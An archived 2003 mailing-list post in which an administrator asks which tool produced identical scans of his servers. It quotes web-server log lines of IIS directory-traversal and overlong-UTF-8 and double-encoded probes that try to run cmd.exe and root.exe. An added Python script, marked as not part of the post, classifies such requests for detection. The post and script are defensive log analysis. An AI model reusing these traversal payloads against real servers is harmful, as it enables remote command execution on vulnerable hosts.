Pantek Library

Anyone know this tool?

From: Danny <danny(at)eboundary.com>
Date: Mon Jul 28 2003 - 23:24:16 EDT


Does anyone happen to know what tool this is? I've seen the exact same scans on 6 of our servers on completely different networks. All the scans have been from different source IPs and all the servers were hit within a space of a few hours.

Curiosity is getting the better of me since I've never seen this exact pattern before :)

64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic boundaries?
AIM: eBoundaryTch | ICQ: 3090141



Received on Tue Jul 29 13:00:17 2003
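
Added example, not part of the original post: a Python sketch that tags request targets like the ones in the log above by the decoding trick they rely on (double percent-encoding, bytes that only occur in overlong UTF-8) and reports, per source IP, whether any tagged request was answered with a status below 400. The tag names and the functions classify and summarize are assumptions made for this example; the sample holds five lines from the post and one constructed benign line.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Five request lines from the post, plus one constructed benign line (192.0.2.10).
SAMPLE = '''64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:19:01 -0500] "GET /index.html HTTP/1.0" 200 512 "-" "-"'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
ESCAPE = re.compile(rb'%[0-9a-fA-F]{2}')

def classify(target):
    """Tag one request target with the probe type and encoding tricks it uses."""
    path = target.split('?', 1)[0]
    once = unquote_to_bytes(path)    # result of a single URL-decode pass
    twice = unquote_to_bytes(once)   # result if a second pass is (wrongly) applied
    tags = set()
    if path.lower().endswith('/root.exe'):
        tags.add('root.exe-probe')
    if b'cmd.exe' in twice.lower():
        tags.add('cmd.exe-request')
    if ESCAPE.search(once):          # an escape survives pass one: %255c, %%35c, ...
        tags.add('double-encoding')
    if b'\xc0' in once or b'\xc1' in once:   # bytes that never occur in valid UTF-8
        tags.add('overlong-utf8')
    if b'../' in twice.replace(b'\\', b'/'):
        tags.add('dot-dot-after-decode')
    return tags

def summarize(log_text):
    """Per source IP: tagged request count, tags seen, tagged targets not answered 4xx/5xx."""
    report = defaultdict(lambda: {'hits': 0, 'tags': set(), 'not_rejected': []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        tags = classify(m.group(2)) if m else set()
        if tags:
            entry = report[m.group(1)]
            entry['hits'] += 1
            entry['tags'] |= tags
            if int(m.group(3)) < 400:   # the server did not refuse the request
                entry['not_rejected'].append(m.group(2))
    return dict(report)

if __name__ == '__main__':
    for ip, entry in summarize(SAMPLE).items():
        print(ip, entry['hits'], sorted(entry['tags']), entry['not_rejected'])
```

An empty not_rejected list for a source means every tagged request from it was answered 4xx or 5xx, as in the log in the post.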

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:14 EDT

